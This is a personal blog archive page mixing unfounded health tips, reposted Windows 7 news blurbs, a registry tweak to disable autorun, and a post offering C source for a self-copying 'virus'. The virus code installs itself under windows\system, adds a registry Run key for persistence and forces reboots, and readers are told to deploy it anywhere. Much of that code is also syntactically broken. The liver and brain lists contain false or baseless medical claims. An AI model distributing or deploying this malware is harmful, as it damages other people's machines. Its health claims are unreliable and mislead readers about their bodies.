Ahsun Taquveem Chohan

    The Blog for computer scientists

    Browsing Posts published by Ahsun

    1. Sleeping too late and waking up too late are main cause.
    2. Not urinating in the morning.
    3. Too much eating.
    4. Skipping breakfast.
    5. Consuming too much medication.
    6. Consuming too much preservatives, additives, food coloring, and artificial sweetener.
    7. Consuming unhealthy cooking oil. As much as possible reduce cooking oil use when frying, which includes even the best cooking oils like olive oil. Do not consume fried foods when you are tired, except if the body is very fit..
    8. Consuming raw (overly done) foods also add to the burden of liver. Veggies should be eaten raw or cooked 3-5 parts. Fried veggies should be finished in one sitting, do not store.

    We should prevent this without necessarily spending more. We just have to adopt a good daily lifestyle and eating habits. Maintaining good eating habits and time condition are very important for our bodies to absorb and get rid of unnecessary chemicals according to ‘schedule.’

    Brain

    Brain is very important organ and we should take care of it. We are damaging our brain on daily basis by doing following things.

    1. No Breakfast
    2. People who do not take breakfast are going to have a lower blood sugar level. This leads to an insufficient supply of nutrients to the brain causing brain degeneration.

    3. Overeating
    4. It causes hardening of the brain arteries, leading to a decrease in mental power.

    5. Smoking
    6. It causes multiple brain shrinkage and may lead to Alzheimer disease.

    7. High Sugar consumption
    8. Too much sugar will interrupt the absorption of proteins and nutrients causing malnutrition and may interfere with brain development.

    9. Air Pollution
    10. The brain is the largest oxygen consumer in our body. Inhaling polluted air decreases the supply of oxygen to the brain, bringing about a decrease in brain efficiency.

    11. Sleep Deprivation
    12. Sleep allows our brain to rest… Long term deprivation from sleep will accelerate the death ofbrain cells..

    13. Head covered while sleeping
    14. Sleeping with the head covered increases the concentration of carbon dioxide and decrease concentration of oxygen that may lead to brain damaging effects.

    15. Working your brain during illness
    16. Working hard or studying with sickness may lead to a decrease in effectiveness of the brain as well as damage the brain.

    17. Lacking in stimulating thoughts
    18. Thinking is the best way to train our brain, lacking in brain stimulation thoughts may cause brain shrinkage.

    19. Talking Rarely
    20. Intellectual conversations will promote the efficiency of the brain

    Above mentioned things should be avoided to utilize brain at maximum output.

    I installed iClone and created this small animation using it.

    Kaspersky Anti-Virus for Windows 7 accompanies the first steps of the Microsoft with a declination of its security suite tailored to the operating system to come. Presented by his publisher as a prototype, Kaspersky Anti-Virus for …

    Originally posted here: 
    Kaspersky Anti-Virus:One of the first security suite for Windows 7 …

    Microsoft’s newest operating system, Windows 7, offers a new feature that allows you to disable or turn off any application you don’t want without any hassle.

    Originally posted here:
    Disable Windows 7 feature which you don't need

    Paul Cooke at Microsoft now responded on The windows security blog. He first agreed that. users of any computer, on any platform, should run anti-virus software, including those running windows 7

    Read more:
    Microsoft Responded To Sophos Windows 7 Vulnerability Claim …

    Comprehensive Microsoft -Ready infrastructure that enhances the performance, security , and availabili… Microsoft Windows Storage Server 2003. Windows Storage Server 2003 is a dedicated file server that offers dependable storage while …

    See the original post:
    Free PDF: Microsoft Windows Server 2003 | Free ebook manual …

    How to disable autorun(.inf) to prevent autorun Trojan
    To disable Autorun system wide (for all users) on all the drives:
    save the following script as .reg -file and double-click it (melt it with registry)

    ======================================================Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]"HonorAutoRunSetting"=dword:00000001"NoDriveTypeAutoRun"=dword:000000ff
    
    =======================================================

    continue reading…

    Many people asked me how to create viruses etc stuff. Here is a simple virus/program which will restart your computer when opened. All you have to do is compile it and then run it where ever you want. Don’t worry if you run it accidentally on your system, I’ll also tell you how to remove this virus from your system completely.

    :-)

    Source Code:

    #include<stdio.h>
    
    #include<dos.h>
    
    #include<dir.h> /If you get error, try using direct.h, if still you get error try compiling it in windows xp
    
    int found,drive_no;char buff[128];
    
    void findroot()
    
    {
    
    int done;
    
    struct ffblk ffblk; //File block structure
    
    done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive
    
    if(done==0)
    
    {
    
    done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not
    
    if(done==0)
    
    {
    
    found=1; //means that the system is already infected
    
    return;
    
    }
    
    drive_no=1;
    
    return;
    
    }
    
    done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);
    
    if(done==0)
    
    {
    
    done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);
    
    if
    
    (done==0)
    
    {
    
    found=1;return;
    
    }
    
    drive_no=2;
    
    return;
    
    }
    
    done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);
    
    if(done==0)
    
    {
    
    done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);
    
    if(done==0)
    
    {
    
    found=1;
    
    return;
    
    }
    
    drive_no=3;
    
    return;
    
    }
    
    done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);
    
    if(done==0)
    
    {
    
    done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);
    
    if(done==0)
    
    {
    
    found=1;
    
    return;
    
    }
    
    drive_no=4;
    
    return;
    
    }
    
    else
    
    exit(0);
    
    }
    
    void main()
    
    {
    
    FILE *self,*target;
    
    findroot();
    
    if(found==0) //if the system is not already infected
    
    {
    
    self=fopen(_argv[0],”rb”); //The virus file open’s itself
    
    switch(drive_no)
    
    {
    
    case 1:
    
    target=fopen("C:\\windows\\system\\sysres.exe","welcome back"); //to place a copy of itself in a remote place
    
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup
    
    break;
    
    case 2:
    
    target=fopen("D:\\windows\\system\\sysres.exe","welcome back");
    
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dD:\\windows\\system\\sysres.exe");
    
    break;
    
    case 3:
    
    target=fopen("E:\\windows\\system\\sysres.exe","welcome back");
    
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dE:\\windows\\system\\sysres.exe");
    
    break;
    
    case 4:
    
    target=fopen("F:\\windows\\system\\sysres.exe","welcome back");
    
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dF:\\windows\\system\\sysres.exe");
    
    break;
    
    default:
    
    exit(0);
    
    }
    
    while(fread(buff,1,1,self)>0)
    
    fwrite(buff,1,1,target);
    
    fcloseall();
    
    }
    
    else
    
    system("shutdown -r -t 0"); //if the system is already infected then just give a command to restart
    
    }

    How to recover/remove the virus:

    1) Open up PC in safe mode

    2) C:\windows:\system … you will find it(sysres) so delete it !

    3) open registry :

    HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

    4) You will find it also delete it …

    If anything else goes wrong, feel free to contact me :-)

    Windows 7 (formerly known as Vienna and Blackcomb) is a complete new version in windows series introduced by Microsoft for use on personal computers, including business PC’s. There is a close relation between security and usability, which the software developers often sacrifice for the other.

    Microsoft is NO Exception.

    continue reading…

    Powered by WordPress Web Design by SRS Solutions © 2010 Ahsun Taquveem Chohan Design by SRS Solutions